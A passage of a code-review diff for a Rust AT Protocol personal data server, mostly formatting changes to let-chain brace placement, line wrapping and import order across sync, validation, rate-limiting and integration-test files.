Err(OAuthAuthError { 260 267 status: StatusCode::UNAUTHORIZED, 261 268 error: "use_dpop_nonce".to_string(),
+6 -5
src/plc/mod.rs
··· 408 408 PlcError::InvalidResponse("verificationMethods must be an object".to_string()) 409 409 })?; 410 410 if let Some(atproto_key) = verification_methods.get("atproto").and_then(|v| v.as_str()) 411 - && atproto_key != ctx.expected_signing_key { 412 - return Err(PlcError::InvalidResponse( 413 - "Incorrect signing key".to_string(), 414 - )); 415 - } 411 + && atproto_key != ctx.expected_signing_key 412 + { 413 + return Err(PlcError::InvalidResponse( 414 + "Incorrect signing key".to_string(), 415 + )); 416 + } 416 417 let also_known_as = obj 417 418 .get("alsoKnownAs") 418 419 .and_then(|v| v.as_array())
+8 -6
src/rate_limit.rs
··· 122 122 pub fn extract_client_ip(headers: &HeaderMap, addr: Option<SocketAddr>) -> String { 123 123 if let Some(forwarded) = headers.get("x-forwarded-for") 124 124 && let Ok(value) = forwarded.to_str() 125 - && let Some(first_ip) = value.split(',').next() { 126 - return first_ip.trim().to_string(); 127 - } 125 + && let Some(first_ip) = value.split(',').next() 126 + { 127 + return first_ip.trim().to_string(); 128 + } 128 129 129 130 if let Some(real_ip) = headers.get("x-real-ip") 130 - && let Ok(value) = real_ip.to_str() { 131 - return value.trim().to_string(); 132 - } 131 + && let Ok(value) = real_ip.to_str() 132 + { 133 + return value.trim().to_string(); 134 + } 133 135 134 136 addr.map(|a| a.ip().to_string()) 135 137 .unwrap_or_else(|| "unknown".to_string())
+45 -42
src/sync/import.rs
··· 77 77 Ipld::Map(obj) => { 78 78 if let Some(Ipld::String(type_str)) = obj.get("$type") 79 79 && type_str == "blob" 80 - && let Some(Ipld::Link(link_cid)) = obj.get("ref") { 81 - let mime = obj.get("mimeType").and_then(|v| { 82 - if let Ipld::String(s) = v { 83 - Some(s.clone()) 84 - } else { 85 - None 86 - } 87 - }); 88 - return vec![BlobRef { 89 - cid: link_cid.to_string(), 90 - mime_type: mime, 91 - }]; 80 + && let Some(Ipld::Link(link_cid)) = obj.get("ref") 81 + { 82 + let mime = obj.get("mimeType").and_then(|v| { 83 + if let Ipld::String(s) = v { 84 + Some(s.clone()) 85 + } else { 86 + None 92 87 } 88 + }); 89 + return vec![BlobRef { 90 + cid: link_cid.to_string(), 91 + mime_type: mime, 92 + }]; 93 + } 93 94 obj.values() 94 95 .flat_map(|v| find_blob_refs_ipld(v, depth + 1)) 95 96 .collect() ··· 110 111 JsonValue::Object(obj) => { 111 112 if let Some(JsonValue::String(type_str)) = obj.get("$type") 112 113 && type_str == "blob" 113 - && let Some(JsonValue::Object(ref_obj)) = obj.get("ref") 114 - && let Some(JsonValue::String(link)) = ref_obj.get("$link") { 115 - let mime = obj 116 - .get("mimeType") 117 - .and_then(|v| v.as_str()) 118 - .map(String::from); 119 - return vec![BlobRef { 120 - cid: link.clone(), 121 - mime_type: mime, 122 - }]; 123 - } 114 + && let Some(JsonValue::Object(ref_obj)) = obj.get("ref") 115 + && let Some(JsonValue::String(link)) = ref_obj.get("$link") 116 + { 117 + let mime = obj 118 + .get("mimeType") 119 + .and_then(|v| v.as_str()) 120 + .map(String::from); 121 + return vec![BlobRef { 122 + cid: link.clone(), 123 + mime_type: mime, 124 + }]; 125 + } 124 126 obj.values() 125 127 .flat_map(|v| find_blob_refs(v, depth + 1)) 126 128 .collect() ··· 195 197 }); 196 198 if let (Some(key), Some(record_cid)) = (key, record_cid) 197 199 && let Some(record_block) = blocks.get(&record_cid) 198 - && let Ok(record_value) = 199 - serde_ipld_dagcbor::from_slice::<Ipld>(record_block) 200 - { 201 - let blob_refs = find_blob_refs_ipld(&record_value, 0); 202 - let parts: Vec<&str> = key.split('/').collect(); 203 - if parts.len() >= 2 { 204 - let collection = parts[..parts.len() - 1].join("/"); 205 - let rkey = parts[parts.len() - 1].to_string(); 206 - records.push(ImportedRecord { 207 - collection, 208 - rkey, 209 - cid: record_cid, 210 - blob_refs, 211 - }); 212 - } 213 - } 200 + && let Ok(record_value) = 201 + serde_ipld_dagcbor::from_slice::<Ipld>(record_block) 202 + { 203 + let blob_refs = find_blob_refs_ipld(&record_value, 0); 204 + let parts: Vec<&str> = key.split('/').collect(); 205 + if parts.len() >= 2 { 206 + let collection = parts[..parts.len() - 1].join("/"); 207 + let rkey = parts[parts.len() - 1].to_string(); 208 + records.push(ImportedRecord { 209 + collection, 210 + rkey, 211 + cid: record_cid, 212 + blob_refs, 213 + }); 214 + } 215 + } 214 216 if let Some(Ipld::Link(tree_cid)) = entry_obj.get("t") { 215 217 stack.push(*tree_cid); 216 218 } ··· 300 302 .await 301 303 .map_err(|e| { 302 304 if let sqlx::Error::Database(ref db_err) = e 303 - && db_err.code().as_deref() == Some("55P03") { 304 - return ImportError::ConcurrentModification; 305 - } 305 + && db_err.code().as_deref() == Some("55P03") 306 + { 307 + return ImportError::ConcurrentModification; 308 + } 306 309 ImportError::Database(e) 307 310 })?; 308 311 if repo.is_none() {
+28 -21
src/sync/util.rs
··· 140 140 .try_into() 141 141 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 142 142 if let Some(ref pdc) = prev_data_cid_str 143 - && let Ok(cid) = Cid::from_str(pdc) { 144 - frame.prev_data = Some(cid); 145 - } 143 + && let Ok(cid) = Cid::from_str(pdc) 144 + { 145 + frame.prev_data = Some(cid); 146 + } 146 147 let commit_cid = frame.commit; 147 148 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 148 149 let mut all_cids: Vec<Cid> = block_cids_str ··· 155 156 } 156 157 if let Some(ref pc) = prev_cid 157 158 && let Ok(Some(prev_bytes)) = state.block_store.get(pc).await 158 - && let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) { 159 - frame.since = Some(rev); 160 - } 159 + && let Some(rev) = extract_rev_from_commit_bytes(&prev_bytes) 160 + { 161 + frame.since = Some(rev); 162 + } 161 163 let car_bytes = if !all_cids.is_empty() { 162 164 let fetched = state.block_store.get_many(&all_cids).await?; 163 165 let mut blocks = std::collections::BTreeMap::new(); ··· 196 198 let mut all_cids: Vec<Cid> = Vec::new(); 197 199 for event in events { 198 200 if let Some(ref commit_cid_str) = event.commit_cid 199 - && let Ok(cid) = Cid::from_str(commit_cid_str) { 200 - all_cids.push(cid); 201 - } 201 + && let Ok(cid) = Cid::from_str(commit_cid_str) 202 + { 203 + all_cids.push(cid); 204 + } 202 205 if let Some(ref prev_cid_str) = event.prev_cid 203 - && let Ok(cid) = Cid::from_str(prev_cid_str) { 204 - all_cids.push(cid); 205 - } 206 + && let Ok(cid) = Cid::from_str(prev_cid_str) 207 + { 208 + all_cids.push(cid); 209 + } 206 210 if let Some(ref block_cids_str) = event.blocks_cids { 207 211 for s in block_cids_str { 208 212 if let Ok(cid) = Cid::from_str(s) { ··· 279 283 .try_into() 280 284 .map_err(|e| anyhow::anyhow!("Invalid event: {}", e))?; 281 285 if let Some(ref pdc) = prev_data_cid_str 282 - && let Ok(cid) = Cid::from_str(pdc) { 283 - frame.prev_data = Some(cid); 284 - } 286 + && let Ok(cid) = Cid::from_str(pdc) 287 + { 288 + frame.prev_data = Some(cid); 289 + } 285 290 let commit_cid = frame.commit; 286 291 let prev_cid = prev_cid_str.as_ref().and_then(|s| Cid::from_str(s).ok()); 287 292 let mut all_cids: Vec<Cid> = block_cids_str ··· 293 298 all_cids.push(commit_cid); 294 299 } 295 300 if let Some(commit_bytes) = prefetched.get(&commit_cid) 296 - && let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) { 297 - frame.rev = rev; 298 - } 301 + && let Some(rev) = extract_rev_from_commit_bytes(commit_bytes) 302 + { 303 + frame.rev = rev; 304 + } 299 305 if let Some(ref pc) = prev_cid 300 306 && let Some(prev_bytes) = prefetched.get(pc) 301 - && let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) { 302 - frame.since = Some(rev); 303 - } 307 + && let Some(rev) = extract_rev_from_commit_bytes(prev_bytes) 308 + { 309 + frame.since = Some(rev); 310 + } 304 311 let car_bytes = if !all_cids.is_empty() { 305 312 let mut blocks = BTreeMap::new(); 306 313 let mut commit_bytes_for_car: Option<Bytes> = None;
+7 -6
src/sync/verify.rs
··· 268 268 stack.push(*tree_cid); 269 269 } 270 270 if let Some(Ipld::Link(value_cid)) = entry_obj.get("v") 271 - && !blocks.contains_key(value_cid) { 272 - warn!( 273 - "Record block {} referenced in MST not in CAR (may be expected for partial export)", 274 - value_cid 275 - ); 276 - } 271 + && !blocks.contains_key(value_cid) 272 + { 273 + warn!( 274 + "Record block {} referenced in MST not in CAR (may be expected for partial export)", 275 + value_cid 276 + ); 277 + } 277 278 } 278 279 } 279 280 }
+49 -42
src/validation/mod.rs
··· 111 111 } 112 112 } 113 113 if let Some(langs) = obj.get("langs").and_then(|v| v.as_array()) 114 - && langs.len() > 3 { 115 - return Err(ValidationError::InvalidField { 116 - path: "langs".to_string(), 117 - message: "Maximum 3 languages allowed".to_string(), 118 - }); 119 - } 114 + && langs.len() > 3 115 + { 116 + return Err(ValidationError::InvalidField { 117 + path: "langs".to_string(), 118 + message: "Maximum 3 languages allowed".to_string(), 119 + }); 120 + } 120 121 if let Some(tags) = obj.get("tags").and_then(|v| v.as_array()) { 121 122 if tags.len() > 8 { 122 123 return Err(ValidationError::InvalidField { ··· 126 127 } 127 128 for (i, tag) in tags.iter().enumerate() { 128 129 if let Some(tag_str) = tag.as_str() 129 - && tag_str.len() > 640 { 130 - return Err(ValidationError::InvalidField { 131 - path: format!("tags/{}", i), 132 - message: "Tag exceeds maximum length of 640 bytes".to_string(), 133 - }); 134 - } 130 + && tag_str.len() > 640 131 + { 132 + return Err(ValidationError::InvalidField { 133 + path: format!("tags/{}", i), 134 + message: "Tag exceeds maximum length of 640 bytes".to_string(), 135 + }); 136 + } 135 137 } 136 138 } 137 139 Ok(()) ··· 198 200 return Err(ValidationError::MissingField("createdAt".to_string())); 199 201 } 200 202 if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 201 - && !subject.starts_with("did:") { 202 - return Err(ValidationError::InvalidField { 203 - path: "subject".to_string(), 204 - message: "Subject must be a DID".to_string(), 205 - }); 206 - } 203 + && !subject.starts_with("did:") 204 + { 205 + return Err(ValidationError::InvalidField { 206 + path: "subject".to_string(), 207 + message: "Subject must be a DID".to_string(), 208 + }); 209 + } 207 210 Ok(()) 208 211 } 209 212 ··· 215 218 return Err(ValidationError::MissingField("createdAt".to_string())); 216 219 } 217 220 if let Some(subject) = obj.get("subject").and_then(|v| v.as_str()) 218 - && !subject.starts_with("did:") { 219 - return Err(ValidationError::InvalidField { 220 - path: "subject".to_string(), 221 - message: "Subject must be a DID".to_string(), 222 - }); 223 - } 221 + && !subject.starts_with("did:") 222 + { 223 + return Err(ValidationError::InvalidField { 224 + path: "subject".to_string(), 225 + message: "Subject must be a DID".to_string(), 226 + }); 227 + } 224 228 Ok(()) 225 229 } 226 230 ··· 235 239 return Err(ValidationError::MissingField("createdAt".to_string())); 236 240 } 237 241 if let Some(name) = obj.get("name").and_then(|v| v.as_str()) 238 - && (name.is_empty() || name.len() > 64) { 239 - return Err(ValidationError::InvalidField { 240 - path: "name".to_string(), 241 - message: "Name must be 1-64 characters".to_string(), 242 - }); 243 - } 242 + && (name.is_empty() || name.len() > 64) 243 + { 244 + return Err(ValidationError::InvalidField { 245 + path: "name".to_string(), 246 + message: "Name must be 1-64 characters".to_string(), 247 + }); 248 + } 244 249 Ok(()) 245 250 } 246 251 ··· 274 279 return Err(ValidationError::MissingField("createdAt".to_string())); 275 280 } 276 281 if let Some(display_name) = obj.get("displayName").and_then(|v| v.as_str()) 277 - && (display_name.is_empty() || display_name.len() > 240) { 278 - return Err(ValidationError::InvalidField { 279 - path: "displayName".to_string(), 280 - message: "displayName must be 1-240 characters".to_string(), 281 - }); 282 - } 282 + && (display_name.is_empty() || display_name.len() > 240) 283 + { 284 + return Err(ValidationError::InvalidField { 285 + path: "displayName".to_string(), 286 + message: "displayName must be 1-240 characters".to_string(), 287 + }); 288 + } 283 289 Ok(()) 284 290 } 285 291 ··· 328 334 return Err(ValidationError::MissingField(format!("{}/cid", path))); 329 335 } 330 336 if let Some(uri) = obj.get("uri").and_then(|v| v.as_str()) 331 - && !uri.starts_with("at://") { 332 - return Err(ValidationError::InvalidField { 333 - path: format!("{}/uri", path), 334 - message: "URI must be an at:// URI".to_string(), 335 - }); 336 - } 337 + && !uri.starts_with("at://") 338 + { 339 + return Err(ValidationError::InvalidField { 340 + path: format!("{}/uri", path), 341 + message: "URI must be an at:// URI".to_string(), 342 + }); 343 + } 337 344 Ok(()) 338 345 } 339 346 }
+56 -14
tests/account_notifications.rs
··· 1 1 mod common; 2 2 use common::{base_url, client, create_account_and_login, get_db_connection_string}; 3 - use tranquil_pds::comms::{NewComms, CommsType, enqueue_comms}; 4 3 use serde_json::{Value, json}; 5 4 use sqlx::PgPool; 5 + use tranquil_pds::comms::{CommsType, NewComms, enqueue_comms}; 6 6 7 7 async fn get_pool() -> PgPool { 8 8 let conn_str = get_db_connection_string().await; ··· 33 33 format!("Subject {}", i), 34 34 format!("Body {}", i), 35 35 ); 36 - enqueue_comms(&pool, comms).await.expect("Failed to enqueue"); 36 + enqueue_comms(&pool, comms) 37 + .await 38 + .expect("Failed to enqueue"); 37 39 } 38 40 39 41 let resp = client 40 - .get(format!("{}/xrpc/com.tranquil.account.getNotificationHistory", base)) 42 + .get(format!( 43 + "{}/xrpc/com.tranquil.account.getNotificationHistory", 44 + base 45 + )) 41 46 .header("Authorization", format!("Bearer {}", token)) 42 47 .send() 43 48 .await ··· 63 68 "discordId": "123456789" 64 69 }); 65 70 let resp = client 66 - .post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base)) 71 + .post(format!( 72 + "{}/xrpc/com.tranquil.account.updateNotificationPrefs", 73 + base 74 + )) 67 75 .header("Authorization", format!("Bearer {}", token)) 68 76 .json(&prefs) 69 77 .send() ··· 71 79 .unwrap(); 72 80 assert_eq!(resp.status(), 200); 73 81 let body: Value = resp.json().await.unwrap(); 74 - assert!(body["verificationRequired"].as_array().unwrap().contains(&json!("discord"))); 82 + assert!( 83 + body["verificationRequired"] 84 + .as_array() 85 + .unwrap() 86 + .contains(&json!("discord")) 87 + ); 75 88 76 89 let pool = get_pool().await; 77 90 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) ··· 92 105 "code": code 93 106 }); 94 107 let resp = client 95 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 108 + .post(format!( 109 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 110 + base 111 + )) 96 112 .header("Authorization", format!("Bearer {}", token)) 97 113 .json(&input) 98 114 .send() ··· 101 117 assert_eq!(resp.status(), 200); 102 118 103 119 let resp = client 104 - .get(format!("{}/xrpc/com.tranquil.account.getNotificationPrefs", base)) 120 + .get(format!( 121 + "{}/xrpc/com.tranquil.account.getNotificationPrefs", 122 + base 123 + )) 105 124 .header("Authorization", format!("Bearer {}", token)) 106 125 .send() 107 126 .await ··· 121 140 "telegramUsername": "testuser" 122 141 }); 123 142 let resp = client 124 - .post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base)) 143 + .post(format!( 144 + "{}/xrpc/com.tranquil.account.updateNotificationPrefs", 145 + base 146 + )) 125 147 .header("Authorization", format!("Bearer {}", token)) 126 148 .json(&prefs) 127 149 .send() ··· 134 156 "code": "000000" 135 157 }); 136 158 let resp = client 137 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 159 + .post(format!( 160 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 161 + base 162 + )) 138 163 .header("Authorization", format!("Bearer {}", token)) 139 164 .json(&input) 140 165 .send() ··· 154 179 "code": "123456" 155 180 }); 156 181 let resp = client 157 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 182 + .post(format!( 183 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 184 + base 185 + )) 158 186 .header("Authorization", format!("Bearer {}", token)) 159 187 .json(&input) 160 188 .send() ··· 175 203 "email": unique_email 176 204 }); 177 205 let resp = client 178 - .post(format!("{}/xrpc/com.tranquil.account.updateNotificationPrefs", base)) 206 + .post(format!( 207 + "{}/xrpc/com.tranquil.account.updateNotificationPrefs", 208 + base 209 + )) 179 210 .header("Authorization", format!("Bearer {}", token)) 180 211 .json(&prefs) 181 212 .send() ··· 183 214 .unwrap(); 184 215 assert_eq!(resp.status(), 200); 185 216 let body: Value = resp.json().await.unwrap(); 186 - assert!(body["verificationRequired"].as_array().unwrap().contains(&json!("email"))); 217 + assert!( 218 + body["verificationRequired"] 219 + .as_array() 220 + .unwrap() 221 + .contains(&json!("email")) 222 + ); 187 223 188 224 let user_id: uuid::Uuid = sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 189 225 .fetch_one(&pool) ··· 203 239 "code": code 204 240 }); 205 241 let resp = client 206 - .post(format!("{}/xrpc/com.tranquil.account.confirmChannelVerification", base)) 242 + .post(format!( 243 + "{}/xrpc/com.tranquil.account.confirmChannelVerification", 244 + base 245 + )) 207 246 .header("Authorization", format!("Bearer {}", token)) 208 247 .json(&input) 209 248 .send() ··· 212 251 assert_eq!(resp.status(), 200); 213 252 214 253 let resp = client 215 - .get(format!("{}/xrpc/com.tranquil.account.getNotificationPrefs", base)) 254 + .get(format!( 255 + "{}/xrpc/com.tranquil.account.getNotificationPrefs", 256 + base 257 + )) 216 258 .header("Authorization", format!("Bearer {}", token)) 217 259 .send() 218 260 .await
+36 -9
tests/admin_search.rs
··· 21 21 .expect("Failed to send request"); 22 22 assert_eq!(res.status(), StatusCode::OK); 23 23 let body: Value = res.json().await.unwrap(); 24 - let accounts = body["accounts"].as_array().expect("accounts should be array"); 24 + let accounts = body["accounts"] 25 + .as_array() 26 + .expect("accounts should be array"); 25 27 assert!(!accounts.is_empty(), "Should return some accounts"); 26 - let found = accounts.iter().any(|a| a["did"].as_str() == Some(&user_did)); 27 - assert!(found, "Should find the created user in results (DID: {})", user_did); 28 + let found = accounts 29 + .iter() 30 + .any(|a| a["did"].as_str() == Some(&user_did)); 31 + assert!( 32 + found, 33 + "Should find the created user in results (DID: {})", 34 + user_did 35 + ); 28 36 } 29 37 30 38 #[tokio::test] ··· 61 69 assert_eq!(res.status(), StatusCode::OK); 62 70 let body: Value = res.json().await.unwrap(); 63 71 let accounts = body["accounts"].as_array().unwrap(); 64 - assert_eq!(accounts.len(), 1, "Should find exactly one account with this handle"); 72 + assert_eq!( 73 + accounts.len(), 74 + 1, 75 + "Should find exactly one account with this handle" 76 + ); 65 77 assert_eq!(accounts[0]["handle"].as_str(), Some(unique_handle.as_str())); 66 78 } 67 79 ··· 100 112 assert_eq!(res2.status(), StatusCode::OK); 101 113 let body2: Value = res2.json().await.unwrap(); 102 114 let accounts2 = body2["accounts"].as_array().unwrap(); 103 - assert!(!accounts2.is_empty(), "Should return more accounts after cursor"); 104 - let first_page_dids: Vec<&str> = accounts.iter().map(|a| a["did"].as_str().unwrap()).collect(); 105 - let second_page_dids: Vec<&str> = accounts2.iter().map(|a| a["did"].as_str().unwrap()).collect(); 115 + assert!( 116 + !accounts2.is_empty(), 117 + "Should return more accounts after cursor" 118 + ); 119 + let first_page_dids: Vec<&str> = accounts 120 + .iter() 121 + .map(|a| a["did"].as_str().unwrap()) 122 + .collect(); 123 + let second_page_dids: Vec<&str> = accounts2 124 + .iter() 125 + .map(|a| a["did"].as_str().unwrap()) 126 + .collect(); 106 127 for did in &second_page_dids { 107 - assert!(!first_page_dids.contains(did), "Second page should not repeat first page DIDs"); 128 + assert!( 129 + !first_page_dids.contains(did), 130 + "Second page should not repeat first page DIDs" 131 + ); 108 132 } 109 133 } 110 134 ··· 160 184 let account = &accounts[0]; 161 185 assert!(account["did"].as_str().is_some(), "Should have did"); 162 186 assert!(account["handle"].as_str().is_some(), "Should have handle"); 163 - assert!(account["indexedAt"].as_str().is_some(), "Should have indexedAt"); 187 + assert!( 188 + account["indexedAt"].as_str().is_some(), 189 + "Should have indexedAt" 190 + ); 164 191 }
+1 -1
tests/admin_stats.rs
··· 38 38 .await 39 39 .unwrap(); 40 40 assert_eq!(resp.status(), 401); 41 - } 41 + }
+10 -2
tests/change_password.rs
··· 57 57 .send() 58 58 .await 59 59 .expect("Failed to try old password"); 60 - assert_eq!(login_old.status(), StatusCode::UNAUTHORIZED, "Old password should not work"); 60 + assert_eq!( 61 + login_old.status(), 62 + StatusCode::UNAUTHORIZED, 63 + "Old password should not work" 64 + ); 61 65 let login_new = client 62 66 .post(format!( 63 67 "{}/xrpc/com.atproto.server.createSession", ··· 70 74 .send() 71 75 .await 72 76 .expect("Failed to try new password"); 73 - assert_eq!(login_new.status(), StatusCode::OK, "New password should work"); 77 + assert_eq!( 78 + login_new.status(), 79 + StatusCode::OK, 80 + "New password should work" 81 + ); 74 82 } 75 83 76 84 #[tokio::test]
+2 -3
tests/common/mod.rs
··· 1 1 use aws_config::BehaviorVersion; 2 2 use aws_sdk_s3::Client as S3Client; 3 3 use aws_sdk_s3::config::Credentials; 4 - use tranquil_pds::state::AppState; 5 4 use chrono::Utc; 6 5 use reqwest::{Client, StatusCode, header}; 7 6 use serde_json::{Value, json}; ··· 12 11 #[allow(unused_imports)] 13 12 use std::time::Duration; 14 13 use tokio::net::TcpListener; 14 + use tranquil_pds::state::AppState; 15 15 use wiremock::matchers::{method, path}; 16 16 use wiremock::{Mock, MockServer, ResponseTemplate}; 17 17 ··· 232 232 .await; 233 233 } 234 234 235 - async fn setup_mock_appview(_mock_server: &MockServer) { 236 - } 235 + async fn setup_mock_appview(_mock_server: &MockServer) {} 237 236 238 237 async fn spawn_app(database_url: String) -> String { 239 238 use tranquil_pds::rate_limit::RateLimiters;
+8 -14
tests/email_update.rs
··· 84 84 .await 85 85 .expect("Failed to confirm email"); 86 86 assert_eq!(res.status(), StatusCode::OK); 87 - let user = sqlx::query!( 88 - "SELECT email FROM users WHERE handle = $1", 89 - handle 90 - ) 91 - .fetch_one(&pool) 92 - .await 93 - .expect("User not found"); 87 + let user = sqlx::query!("SELECT email FROM users WHERE handle = $1", handle) 88 + .fetch_one(&pool) 89 + .await 90 + .expect("User not found"); 94 91 assert_eq!(user.email, Some(new_email)); 95 92 96 93 let verification = sqlx::query!( ··· 320 317 .await 321 318 .expect("Failed to update email"); 322 319 assert_eq!(res.status(), StatusCode::OK); 323 - let user = sqlx::query!( 324 - "SELECT email FROM users WHERE handle = $1", 325 - handle 326 - ) 327 - .fetch_one(&pool) 328 - .await 329 - .expect("User not found"); 320 + let user = sqlx::query!("SELECT email FROM users WHERE handle = $1", handle) 321 + .fetch_one(&pool) 322 + .await 323 + .expect("User not found"); 330 324 assert_eq!(user.email, Some(new_email)); 331 325 let verification = sqlx::query!( 332 326 "SELECT code FROM channel_verifications WHERE user_id = (SELECT id FROM users WHERE handle = $1) AND channel = 'email'",
+98 -21
tests/image_processing.rs
··· 1 + use image::{DynamicImage, ImageFormat}; 2 + use std::io::Cursor; 1 3 use tranquil_pds::image::{ 2 4 DEFAULT_MAX_FILE_SIZE, ImageError, ImageProcessor, OutputFormat, THUMB_SIZE_FEED, 3 5 THUMB_SIZE_FULL, 4 6 }; 5 - use image::{DynamicImage, ImageFormat}; 6 - use std::io::Cursor; 7 7 8 8 fn create_test_png(width: u32, height: u32) -> Vec<u8> { 9 9 let img = DynamicImage::new_rgb8(width, height); 10 10 let mut buf = Vec::new(); 11 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap(); 11 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png) 12 + .unwrap(); 12 13 buf 13 14 } 14 15 15 16 fn create_test_jpeg(width: u32, height: u32) -> Vec<u8> { 16 17 let img = DynamicImage::new_rgb8(width, height); 17 18 let mut buf = Vec::new(); 18 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg).unwrap(); 19 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg) 20 + .unwrap(); 19 21 buf 20 22 } 21 23 22 24 fn create_test_gif(width: u32, height: u32) -> Vec<u8> { 23 25 let img = DynamicImage::new_rgb8(width, height); 24 26 let mut buf = Vec::new(); 25 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif).unwrap(); 27 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Gif) 28 + .unwrap(); 26 29 buf 27 30 } 28 31 29 32 fn create_test_webp(width: u32, height: u32) -> Vec<u8> { 30 33 let img = DynamicImage::new_rgb8(width, height); 31 34 let mut buf = Vec::new(); 32 - img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP).unwrap(); 35 + img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP) 36 + .unwrap(); 33 37 buf 34 38 } 35 39 ··· 62 66 63 67 let small = create_test_png(100, 100); 64 68 let result = processor.process(&small, "image/png").unwrap(); 65 - assert!(result.thumbnail_feed.is_none(), "Small image should not get feed thumbnail"); 66 - assert!(result.thumbnail_full.is_none(), "Small image should not get full thumbnail"); 69 + assert!( 70 + result.thumbnail_feed.is_none(), 71 + "Small image should not get feed thumbnail" 72 + ); 73 + assert!( 74 + result.thumbnail_full.is_none(), 75 + "Small image should not get full thumbnail" 76 + ); 67 77 68 78 let medium = create_test_png(500, 500); 69 79 let result = processor.process(&medium, "image/png").unwrap(); 70 - assert!(result.thumbnail_feed.is_some(), "Medium image should have feed thumbnail"); 71 - assert!(result.thumbnail_full.is_none(), "Medium image should NOT have full thumbnail"); 80 + assert!( 81 + result.thumbnail_feed.is_some(), 82 + "Medium image should have feed thumbnail" 83 + ); 84 + assert!( 85 + result.thumbnail_full.is_none(), 86 + "Medium image should NOT have full thumbnail" 87 + ); 72 88 73 89 let large = create_test_png(2000, 2000); 74 90 let result = processor.process(&large, "image/png").unwrap(); 75 - assert!(result.thumbnail_feed.is_some(), "Large image should have feed thumbnail"); 76 - assert!(result.thumbnail_full.is_some(), "Large image should have full thumbnail"); 91 + assert!( 92 + result.thumbnail_feed.is_some(), 93 + "Large image should have feed thumbnail" 94 + ); 95 + assert!( 96 + result.thumbnail_full.is_some(), 97 + "Large image should have full thumbnail" 98 + ); 77 99 let thumb = result.thumbnail_feed.unwrap(); 78 100 assert!(thumb.width <= THUMB_SIZE_FEED && thumb.height <= THUMB_SIZE_FEED); 79 101 let full = result.thumbnail_full.unwrap(); ··· 81 103 82 104 let at_feed = create_test_png(THUMB_SIZE_FEED, THUMB_SIZE_FEED); 83 105 let above_feed = create_test_png(THUMB_SIZE_FEED + 1, THUMB_SIZE_FEED + 1); 84 - assert!(processor.process(&at_feed, "image/png").unwrap().thumbnail_feed.is_none()); 85 - assert!(processor.process(&above_feed, "image/png").unwrap().thumbnail_feed.is_some()); 106 + assert!( 107 + processor 108 + .process(&at_feed, "image/png") 109 + .unwrap() 110 + .thumbnail_feed 111 + .is_none() 112 + ); 113 + assert!( 114 + processor 115 + .process(&above_feed, "image/png") 116 + .unwrap() 117 + .thumbnail_feed 118 + .is_some() 119 + ); 86 120 87 121 let at_full = create_test_png(THUMB_SIZE_FULL, THUMB_SIZE_FULL); 88 122 let above_full = create_test_png(THUMB_SIZE_FULL + 1, THUMB_SIZE_FULL + 1); 89 - assert!(processor.process(&at_full, "image/png").unwrap().thumbnail_full.is_none()); 90 - assert!(processor.process(&above_full, "image/png").unwrap().thumbnail_full.is_some()); 123 + assert!( 124 + processor 125 + .process(&at_full, "image/png") 126 + .unwrap() 127 + .thumbnail_full 128 + .is_none() 129 + ); 130 + assert!( 131 + processor 132 + .process(&above_full, "image/png") 133 + .unwrap() 134 + .thumbnail_full 135 + .is_some() 136 + ); 91 137 92 138 let disabled = ImageProcessor::new().with_thumbnails(false); 93 139 let result = disabled.process(&large, "image/png").unwrap(); ··· 100 146 let jpeg = create_test_jpeg(300, 300); 101 147 102 148 let webp_proc = ImageProcessor::new().with_output_format(OutputFormat::WebP); 103 - assert_eq!(webp_proc.process(&png, "image/png").unwrap().original.mime_type, "image/webp"); 149 + assert_eq!( 150 + webp_proc 151 + .process(&png, "image/png") 152 + .unwrap() 153 + .original 154 + .mime_type, 155 + "image/webp" 156 + ); 104 157 105 158 let jpeg_proc = ImageProcessor::new().with_output_format(OutputFormat::Jpeg); 106 - assert_eq!(jpeg_proc.process(&png, "image/png").unwrap().original.mime_type, "image/jpeg"); 159 + assert_eq!( 160 + jpeg_proc 161 + .process(&png, "image/png") 162 + .unwrap() 163 + .original 164 + .mime_type, 165 + "image/jpeg" 166 + ); 107 167 108 168 let png_proc = ImageProcessor::new().with_output_format(OutputFormat::Png); 109 - assert_eq!(png_proc.process(&jpeg, "image/jpeg").unwrap().original.mime_type, "image/png"); 169 + assert_eq!( 170 + png_proc 171 + .process(&jpeg, "image/jpeg") 172 + .unwrap() 173 + .original 174 + .mime_type, 175 + "image/png" 176 + ); 110 177 } 111 178 112 179 #[test] ··· 116 183 let max_dim = ImageProcessor::new().with_max_dimension(1000); 117 184 let large = create_test_png(2000, 2000); 118 185 let result = max_dim.process(&large, "image/png"); 119 - assert!(matches!(result, Err(ImageError::TooLarge { width: 2000, height: 2000, max_dimension: 1000 }))); 186 + assert!(matches!( 187 + result, 188 + Err(ImageError::TooLarge { 189 + width: 2000, 190 + height: 2000, 191 + max_dimension: 1000 192 + }) 193 + )); 120 194 121 195 let max_file = ImageProcessor::new().with_max_file_size(100); 122 196 let data = create_test_png(500, 500); 123 197 let result = max_file.process(&data, "image/png"); 124 - assert!(matches!(result, Err(ImageError::FileTooLarge { max_size: 100, .. }))); 198 + assert!(matches!( 199 + result, 200 + Err(ImageError::FileTooLarge { max_size: 100, .. 